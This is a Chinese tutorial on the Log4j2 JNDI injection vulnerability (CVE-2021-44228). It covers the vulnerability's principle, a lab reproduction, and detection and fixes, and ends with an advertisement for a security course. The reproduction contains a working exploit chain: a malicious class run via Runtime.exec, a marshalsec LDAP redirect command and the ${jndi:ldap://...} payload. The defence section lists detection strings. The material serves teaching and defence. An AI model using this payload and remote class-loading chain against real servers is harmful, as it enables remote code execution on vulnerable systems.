Log4j2 反序列化漏洞原理与复现
- 1 漏洞介绍
- 1.1 Log4j介绍
- 1.2 Log4j漏洞原理
- 1.3 相关解释
- 2 复现流程
- 2.1 环境搭建
- 2.2 测试
- 2.3 过程分析
- 3 漏洞防御
- 3.1 排查方法
- 3.2 排查工具
- 3.3 修复
Log4j→Log for Java,Apache的开源日志记录组件
JDK→1.8u21以下的版本
CVE-2021-44228 远程代码执行 →2.15.0修复
CVE-2021-45046 拒绝服务Dos →2.16.0修复
CVE-2021-45105 拒绝服务Dos →2.17.0修复
CVE-2021-44832 远程代码执行 →2.17.1修复
1 漏洞介绍
1.1 Log4j介绍
Log4j为了输出日志时能输出任意位置的Java对象,引入了Lookup接口,这个Lookup接口可以看作是JNDI的一种实现,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java的序列化或反序列化传输,从远程服务器上查找。
1.2 Log4j漏洞原理
由于Lookup接口的原因,Log4j就暗含JNDI注入漏洞,可以联合使用JNDI+LDAP或者JNDI+RMI通过命名功能直接从远程服务器上调用文件并在本地执行。
Log4j在处理消息转换时,会按照字符检测每条日志,当日志中包含${}时,则会将表达式的内容替换成真实的内容(即lookup接口查找得到的内容),使用LDAP或RMI协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j的漏洞。
1.3 相关解释
LDAP协议
LDAP(LigntweightDirectoryAccessProtocol),轻量级目录访问协议,既是一种服务,也是一种协议,是JNDI的一种底层实现,主要功能是提供命名关键字到对象的映射目录,开发人员可以通过输入名称,获取到对象的内容。简单来说,就是搜索功能,它是分布式的,允许从远程服务器上面加载获取对象。默认服务端口389.。
JNDI接口
JavaNaming andDirectoryInterface,JAVA命名和目录接口(命名服务接口),应用通过该接口与具体的目录服务进行交互,允许通过名称发现和查找数据或对象,可用于动态加载配置等。
- 发布服务(名字和资源的映射)
- 用名字查找资源
JNDI注入流程:攻击者生成一个恶意的类文件,上传到一个为攻击者服务的HTTP服务器,向目标服务器(靶机,运行了LDAP服务,并指定了恶意类文件所在的地址)给HTTP请求中向Java应用程序传入恶意参数(比如${jndi:ldap://xxx.com:1234/xxx}),指向的是LDAP服务器不存在的资源,当JNDI接口使用lookup查找时,发现在参数指定的LDAP服务器中找不到,于是根据LDAP服务器预设的地址自动从存有恶意类文件的HTTP服务器动态加载对象。
#mermaid-svg-dPymVfnvbTT1yDEh {font-family:“trebuchet ms”,verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-dPymVfnvbTT1yDEh .error-icon{fill:#552222;}#mermaid-svg-dPymVfnvbTT1yDEh .error-text{fill:#552222;stroke:#552222;}#mermaid-svg-dPymVfnvbTT1yDEh .edge-thickness-normal{stroke-width:2px;}#mermaid-svg-dPymVfnvbTT1yDEh .edge-thickness-thick{stroke-width:3.5px;}#mermaid-svg-dPymVfnvbTT1yDEh .edge-pattern-solid{stroke-dasharray:0;}#mermaid-svg-dPymVfnvbTT1yDEh .edge-pattern-dashed{stroke-dasharray:3;}#mermaid-svg-dPymVfnvbTT1yDEh .edge-pattern-dotted{stroke-dasharray:2;}#mermaid-svg-dPymVfnvbTT1yDEh .marker{fill:#333333;stroke:#333333;}#mermaid-svg-dPymVfnvbTT1yDEh .marker.cross{stroke:#333333;}#mermaid-svg-dPymVfnvbTT1yDEh svg{font-family:“trebuchet ms”,verdana,arial,sans-serif;font-size:16px;}#mermaid-svg-dPymVfnvbTT1yDEh .label{font-family:“trebuchet ms”,verdana,arial,sans-serif;color:#333;}#mermaid-svg-dPymVfnvbTT1yDEh .cluster-label text{fill:#333;}#mermaid-svg-dPymVfnvbTT1yDEh .cluster-label span{color:#333;}#mermaid-svg-dPymVfnvbTT1yDEh .label text,#mermaid-svg-dPymVfnvbTT1yDEh span{fill:#333;color:#333;}#mermaid-svg-dPymVfnvbTT1yDEh .node rect,#mermaid-svg-dPymVfnvbTT1yDEh .node circle,#mermaid-svg-dPymVfnvbTT1yDEh .node ellipse,#mermaid-svg-dPymVfnvbTT1yDEh .node polygon,#mermaid-svg-dPymVfnvbTT1yDEh .node path{fill:#ECECFF;stroke:#9370DB;stroke-width:1px;}#mermaid-svg-dPymVfnvbTT1yDEh .node .label{text-align:center;}#mermaid-svg-dPymVfnvbTT1yDEh .node.clickable{cursor:pointer;}#mermaid-svg-dPymVfnvbTT1yDEh .arrowheadPath{fill:#333333;}#mermaid-svg-dPymVfnvbTT1yDEh .edgePath .path{stroke:#333333;stroke-width:2.0px;}#mermaid-svg-dPymVfnvbTT1yDEh .flowchart-link{stroke:#333333;fill:none;}#mermaid-svg-dPymVfnvbTT1yDEh .edgeLabel{background-color:#e8e8e8;text-align:center;}#mermaid-svg-dPymVfnvbTT1yDEh .edgeLabel rect{opacity:0.5;background-color:#e8e8e8;fill:#e8e8e8;}#mermaid-svg-dPymVfnvbTT1yDEh .cluster rect{fill:#ffffde;stroke:#aaaa33;stroke-width:1px;}#mermaid-svg-dPymVfnvbTT1yDEh .cluster text{fill:#333;}#mermaid-svg-dPymVfnvbTT1yDEh .cluster span{color:#333;}#mermaid-svg-dPymVfnvbTT1yDEh div.mermaidTooltip{position:absolute;text-align:center;max-width:200px;padding:2px;font-family:“trebuchet ms”,verdana,arial,sans-serif;font-size:12px;background:hsl(80, 100%, 96.2745098039%);border:1px solid #aaaa33;border-radius:2px;pointer-events:none;z-index:100;}#mermaid-svg-dPymVfnvbTT1yDEh :root{–mermaid-font-family:“trebuchet ms”,verdana,arial,sans-serif;}
1 上传到
2 攻击者传入
3 lookup
4 找不到类返回一个地址
5 到指定地址加载类
6 恶意类下载到本地
恶意类
HTTP服务器
LDAP服务器
Java应用程序
log4j JNDI接口
恶意参数
7 执行恶意类的static代码块
#mermaid-svg-HZKiKMzQNxXyf8vx {font-family:“trebuchet ms”,verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-HZKiKMzQNxXyf8vx .error-icon{fill:#552222;}#mermaid-svg-HZKiKMzQNxXyf8vx .error-text{fill:#552222;stroke:#552222;}#mermaid-svg-HZKiKMzQNxXyf8vx .edge-thickness-normal{stroke-width:2px;}#mermaid-svg-HZKiKMzQNxXyf8vx .edge-thickness-thick{stroke-width:3.5px;}#mermaid-svg-HZKiKMzQNxXyf8vx .edge-pattern-solid{stroke-dasharray:0;}#mermaid-svg-HZKiKMzQNxXyf8vx .edge-pattern-dashed{stroke-dasharray:3;}#mermaid-svg-HZKiKMzQNxXyf8vx .edge-pattern-dotted{stroke-dasharray:2;}#mermaid-svg-HZKiKMzQNxXyf8vx .marker{fill:#333333;stroke:#333333;}#mermaid-svg-HZKiKMzQNxXyf8vx .marker.cross{stroke:#333333;}#mermaid-svg-HZKiKMzQNxXyf8vx svg{font-family:“trebuchet ms”,verdana,arial,sans-serif;font-size:16px;}#mermaid-svg-HZKiKMzQNxXyf8vx .actor{stroke:hsl(259.6261682243, 59.7765363128%, 87.9019607843%);fill:#ECECFF;}#mermaid-svg-HZKiKMzQNxXyf8vx text.actor>tspan{fill:black;stroke:none;}#mermaid-svg-HZKiKMzQNxXyf8vx .actor-line{stroke:grey;}#mermaid-svg-HZKiKMzQNxXyf8vx .messageLine0{stroke-width:1.5;stroke-dasharray:none;stroke:#333;}#mermaid-svg-HZKiKMzQNxXyf8vx .messageLine1{stroke-width:1.5;stroke-dasharray:2,2;stroke:#333;}#mermaid-svg-HZKiKMzQNxXyf8vx #arrowhead path{fill:#333;stroke:#333;}#mermaid-svg-HZKiKMzQNxXyf8vx .sequenceNumber{fill:white;}#mermaid-svg-HZKiKMzQNxXyf8vx #sequencenumber{fill:#333;}#mermaid-svg-HZKiKMzQNxXyf8vx #crosshead path{fill:#333;stroke:#333;}#mermaid-svg-HZKiKMzQNxXyf8vx .messageText{fill:#333;stroke:#333;}#mermaid-svg-HZKiKMzQNxXyf8vx .labelBox{stroke:hsl(259.6261682243, 59.7765363128%, 87.9019607843%);fill:#ECECFF;}#mermaid-svg-HZKiKMzQNxXyf8vx .labelText,#mermaid-svg-HZKiKMzQNxXyf8vx .labelText>tspan{fill:black;stroke:none;}#mermaid-svg-HZKiKMzQNxXyf8vx .loopText,#mermaid-svg-HZKiKMzQNxXyf8vx .loopText>tspan{fill:black;stroke:none;}#mermaid-svg-HZKiKMzQNxXyf8vx .loopLine{stroke-width:2px;stroke-dasharray:2,2;stroke:hsl(259.6261682243, 59.7765363128%, 87.9019607843%);fill:hsl(259.6261682243, 59.7765363128%, 87.9019607843%);}#mermaid-svg-HZKiKMzQNxXyf8vx .note{stroke:#aaaa33;fill:#fff5ad;}#mermaid-svg-HZKiKMzQNxXyf8vx .noteText,#mermaid-svg-HZKiKMzQNxXyf8vx .noteText>tspan{fill:black;stroke:none;}#mermaid-svg-HZKiKMzQNxXyf8vx .activation0{fill:#f4f4f4;stroke:#666;}#mermaid-svg-HZKiKMzQNxXyf8vx .activation1{fill:#f4f4f4;stroke:#666;}#mermaid-svg-HZKiKMzQNxXyf8vx .activation2{fill:#f4f4f4;stroke:#666;}#mermaid-svg-HZKiKMzQNxXyf8vx .actorPopupMenu{position:absolute;}#mermaid-svg-HZKiKMzQNxXyf8vx .actorPopupMenuPanel{position:absolute;fill:#ECECFF;box-shadow:0px 8px 16px 0px rgba(0,0,0,0.2);filter:drop-shadow(3px 5px 2px rgb(0 0 0 / 0.4));}#mermaid-svg-HZKiKMzQNxXyf8vx .actor-man line{stroke:hsl(259.6261682243, 59.7765363128%, 87.9019607843%);fill:#ECECFF;}#mermaid-svg-HZKiKMzQNxXyf8vx .actor-man circle,#mermaid-svg-HZKiKMzQNxXyf8vx line{stroke:hsl(259.6261682243, 59.7765363128%, 87.9019607843%);fill:#ECECFF;stroke-width:2px;}#mermaid-svg-HZKiKMzQNxXyf8vx :root{–mermaid-font-family:“trebuchet ms”,verdana,arial,sans-serif;} 攻击者 HTTP服务器 LDAP服务器 Java程序 log4j JNDI接口 恶意类的static代码块 传入一个恶意类,为攻击者服务 启动,指定默认转移地址为HTTP服务器 开启 1.传入一个恶意参数(指定LDAP服务器) 2.lookup 3.找不到类,返回默认地址 4.访问 5.返回(下载)恶意类到本地 6.执行 攻击者 HTTP服务器 LDAP服务器 Java程序 log4j JNDI接口 恶意类的static代码块
RMI协议
JAVA的一种远程接口调用协议,在TCP协议上传递可序列化的Java对象,即可以实现调用远程方法和调用本地方法一样简单。
2 复现流程
2.1 环境搭建
靶机:127.0.0.1
LDAP服务器:192.168.101.133
HTTP服务器:192.168.101.128
Java
JDK1.8u121以下的版本,Maven(需要安装和配置),log4j项目包
服务器
HTTP服务器(存放恶意类Exploit.class),使用phpstudy建立一个网站,端口为2222
LDAP服务器,下载marshalsec-0.0.3-SNAPSHOT-all.jar
Exploit.class
/* * Exploit.java * 将其编译后生成Exploit.class * 上传到HTTP服务器 */ import java.io.IOException; public class Exploit { static { try { // 打开windows电脑的计算器 proof of content Runtime.getRuntime().exec("calc"); } catch (IOException e) { e.printStackTrace(); } } }2.2 测试
LDAP服务器中,执行如下代码
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.101.128:2222/#Exploit 1234其中Exploit是恶意类的类名,1234是监听的端口号,该工具可以启动JNDI或RMI接口。
当命令行显示Listening on 0.0.0.0:1234时表示服务开启成功。
Log4J.java
import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class Log4J { private static final Logger logger = LogManager.getLogger(Log4J.class); public static void main(String[] args) { logger.error("${jndi:ldap://192.168.101.133:2222/test}"); } }其中主要是靠如下语句:
${jndi:ldap://192.168.101.133:1234/test}执行成功后,可以弹出计算器,LDAP服务器的命令行窗口会显示Send LDAP reference result for test redirecting to http://192.168.101.128:2222/Exploit.class
!!!
凡是Java应用程序,在获取用户输入时使用了Log4j组件且未作有效验证或限制的,都可能有该漏洞,在输入位置传入如上语句即可。
2.3 过程分析
Log4J Lookups介绍:https://logging.apache.org/log4j/2.x/manual/lookups
被攻击服务器收到恶意参数(语句)后,通过Log4J将其作为日志打印。
由于日志在打印时当遇到${后,Interpolator类以:号作为分割,将表达式内容分割成两部分,前面部分作为 prefix,后面部分作为 key。然后通过prefix去找对应的 lookup,通过对应的lookup实例调用lookup方法,最后将key作为参数带入执行。
而在LDAP服务器上找不到,于是跳转到指定地址下载恶意类到本地,再调用Java的NamingManager.getObjectFactoryFromReference()方法,通过默认构造函数将其实例化,进而导致攻击代码中的静态代码块中的内容被执行,引发命令执行漏洞。
3 漏洞防御
3.1 排查方法
- pom版本检查
- 可以通过检查日志中是否存在“jndi:ldap://”、“jndi:rmi”、“dnslog.cn”等字符来发现可能的攻击行为。
- 检查日志中是否存在相关堆栈报错,堆栈里是否有JndiLookup、ldapURLContext、getObjectFactoryFromReference等与 jndi 调用相关的堆栈信息。
3.2 排查工具
- https://static.threatbook.cn/tools/log4j-localcheck.sh
- https://sca.seczone.cn/allScanner.zip
3.3 修复
- 将Log4j、jdk升级到最新版本
- 禁止用户请求参数出现攻击关键字
- 禁止lookup下载远程文件(命名引用)
- 禁止Log4j的应用连接外网
- 禁止Log4j使用lookup
- 从Log4j jar包中中删除lookup 2.10以下
- 设置参数:
log4j2.formatMsgNoLookups=True - 修改JVM参数:
-Dlog4j2.formatMsgNoLookups=true - 系统环境变量:
FORMAT_MESSAGES_PATTERN_DISABLE_LOOUPS设置为true
学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、 部分核心内容展示
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识
2、Linux操作系统
3、WEB架构基础与HTTP协议
4、Web渗透测试
5、渗透测试案例分享
6、渗透测试实战技巧
7、攻防对战实战
8、CTF之MISC实战讲解
3、适合学习的人群
一、基础适配人群
- 零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
- 开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
- 应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
二、能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
)
设计与实现:Production-Grade Agentic AI System Design and Implementation)
